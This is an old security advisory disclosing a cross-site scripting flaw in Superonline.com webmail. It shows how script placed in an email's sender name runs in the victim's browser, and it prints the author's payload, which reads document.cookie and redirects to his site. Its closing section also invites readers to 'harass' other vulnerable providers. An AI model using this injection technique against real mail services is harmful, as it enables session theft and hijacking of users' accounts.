--Security Report--
Advisory: XSS attack on Superonline.com email service.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 01/01/06 04:18 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx_at_nukedx.com
Web: http://www.nukedx.com
}
---
About: Via this method,the Superonline Mails are being subjected to an attack
namely XSS attack a.k.a "Cross Site Scripting" .The attacker ,with the help of
the mail user clicking on the mail received, is able to inject a code with the
mail. The only thing necessary is to click on the mail,no need to open and read
it.As known,some E-mail providers use some scripts in web interfaces and some
bugs on "print or output scripts" grants us the chance to see what we can do
about them.
---
How: The name as following written as From: Name <sender_at_attacker.com> and
being
send to the server and the victim receives it as From: [XSS-text]
<sender_at_attacker.com> and kaboom! , the mail user(namely our victim) is being
injected via XSS code . If we set our name with 28 chars and then add our XSS
code , victim reads this mail's sender as our name without XSS code injection
and gets infected.I used my name as "Mustafa Can<script></script>" ( not with
quotation marks ) and converted it to 28 chars and injected it with XSS code.
The mail user may be infected with a 28-char XSS code while viewing inbox
too.The XSS code personally used was:
Can<script></script><script>alert(document.cookie);</script><script>alert('You
have just been infected with XSS
code');</script><script>location.href('http://www.nukedx.com/pwned.htm');</script>
---
Bonus: This bug is currently available on some OTHER mail providers too.(Don't
get excited,not on so-called Famous and Safe ones such as
Hotmail,Gmail,ICQmail,MyNet ) but some other ones such as Superonline and the
ones which are awaiting you to harass on them.
For further information,please contact me from the contact I have left above,I
am not able to provide more information via mails,indisputably.
Pictures of XSS
Inbox: http://www.nukedx.com/gelenmail.png
IN Mail: http://www.nukedx.com/superxss.png
Regards,
>From the NWPX team,
nuker a.k.a nukedx
